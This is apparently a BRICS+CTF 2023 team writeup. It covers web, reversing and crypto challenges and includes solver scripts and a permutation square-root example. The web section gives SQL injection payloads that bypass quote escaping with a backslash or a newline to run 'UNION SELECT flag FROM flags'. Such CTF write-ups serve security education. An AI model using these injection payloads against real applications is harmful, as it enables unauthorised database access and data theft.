
BRICS+CTF 2023

UKFC 2023 BRICS+CTF Writeup

Web

ChadGPT

  • A backslash cancels the escaping, so the quote is controllable

{"q":"aaaaaaaaaaaaaaaaaaaaaa\\' UNION SELECT flag FROM flags #"}

GigaChadGPT

if err := json.NewDecoder(tee).Decode(&j); err != nil {
        return true
}

{"q":"aaaaaaaaaaaaaaaaaaaaaa
'UNION SELECT flag FROM flags#"}

shellcode????

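  • The binary builds its own output-formatting system
  • Look up the original function (google it) and check what its real parameters are

import math

temp = 0xFFFFFFFF
res = [0xFFF1D63C,0xFFEE7C50,0xFFE8D24E,0xFFE3B18D,0xFFFE7D90,0xFFF32412,0xFFFE6C39,0xFFF3112A,0xFFF24223,0xFFF31A25,0xFFFE8490,0xFFF316C5,0xFFE7C35C,0xFFFE57B0,0xFFEAA081,0xFFE99861,0xFFFE1D16,0xFFE85900,0xFFFE6818,0xFFF31065,0xFFE7AB43,0xFFF2FE92,0xFFFE8021,0xFFF0E101,0xFFEE03B9,0xFFF1E081]
# Undo the 32-bit complement on each stored value
for i in range(len(res)):
    res[i] = temp - res[i]
# Characters at the even positions of the flag
key = ['b','i','s','{','0','_','0','_','a','_','0','_','u','1','p','r','3','t','1','_','u','_','0','d','j','b']
# Print each key character followed by the character recovered from it:
# floor(sqrt(ord(key_char)**3 - value)), computed with exact integer arithmetic
for i in range(len(res)):
    print(key[i], end='')
    print(chr(math.isqrt(ord(key[i]) ** 3 - res[i])), end='')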

sqrt

  • Permutation P*P = x; given x, find P
  • Decompose the permutation into cycles, then use the cycle rules for squaring a permutation to work back to the original cycles, which gives the candidate original permutations to brute-force

import hashlib

# Build the original permutation from its cycles
def restore_arrangement_from_cycles(cycles):
    n = 256
    arrangement = [0] * n

    for cycle in cycles:
        for i, element in enumerate(cycle):
            arrangement[element - 1] = cycle[(i + 1) % len(cycle)]


    return arrangement


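# Enumerate the candidate original cycles
e = []
d = []
b = []
# c is appended to every candidate below; its value is not given in the writeup
c = []

# Assemble each candidate permutation and test it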
for j in b:
    for m in e:
        for k in d:
            cycles = []
            cycles.append(j)
            cycles.append(c)
            for l in m:
                cycles.append(l)
            for l in k:
                cycles.append(l)
            s = [18, 188, 48, 47, 100, 234, 225, 8, 187, 34, 124, 113, 118, 252, 137, 196, 125, 20, 251, 168, 167, 5, 225, 134, 66, 203, 26, 148, 63, 181, 213, 124, 170, 234, 35, 120, 47, 69, 157, 69, 194]
            permutations = restore_arrangement_from_cycles(cycles)

            res = [x ^ y for x, y in zip(hashlib.sha512(str(permutations).encode()).digest(), s)]
            string = ''.join(chr(code) for code in res)
            if 'brics+' in string:
                print(string)
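
The cycle rule used above, as an added example (not code from the original writeup): squaring keeps an odd cycle at its length and splits a 2L-cycle into two L-cycles, so roots come from rooting odd cycles alone or interleaving equal-length pairs. It goes beyond the script above by enumerating every root of x; it uses 0-indexed lists (the script above is 1-indexed), and all function names and the sample permutation are constructed for illustration.

```python
from itertools import product

def cycles_of(perm):
    seen, out = set(), []
    for start in range(len(perm)):
        cyc, j = [], start
        while j not in seen:
            seen.add(j)
            cyc.append(j)
            j = perm[j]
        if cyc:
            out.append(cyc)
    return out

def square(p):
    return [p[p[i]] for i in range(len(p))]

def root_options(cycles):
    """Yield every way to build root cycles from x-cycles of one length L."""
    if not cycles:
        yield []
        return
    first, rest = cycles[0], cycles[1:]
    L = len(first)
    if L % 2 == 1:
        # An odd cycle can be rooted alone: step by (L+1)/2, the inverse of 2 mod L.
        h = (L + 1) // 2
        alone = [first[(i * h) % L] for i in range(L)]
        for tail in root_options(rest):
            yield [alone] + tail
    # Any two cycles of equal length interleave into one 2L-cycle, in L ways.
    for k, other in enumerate(rest):
        for r in range(L):
            merged = [v for i in range(L) for v in (first[i], other[(i + r) % L])]
            for tail in root_options(rest[:k] + rest[k + 1:]):
                yield [merged] + tail

def square_roots(x):
    """Yield every permutation P with P*P == x (nothing if no root exists)."""
    by_len = {}
    for c in cycles_of(x):
        by_len.setdefault(len(c), []).append(c)
    for combo in product(*(list(root_options(g)) for g in by_len.values())):
        p = [0] * len(x)
        for cyc in (c for part in combo for c in part):
            for i, v in enumerate(cyc):
                p[v] = cyc[(i + 1) % len(cyc)]
        yield p

SAMPLE_X = square([1, 2, 3, 0, 5, 6, 4])  # constructed: a 4-cycle and a 3-cycle, squared
```

Each yielded candidate can be hashed and XORed against the ciphertext exactly as in the loop above; an x with an odd number of even-length cycles of some length yields no candidates at all.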
Licensed under CC BY-NC-SA 4.0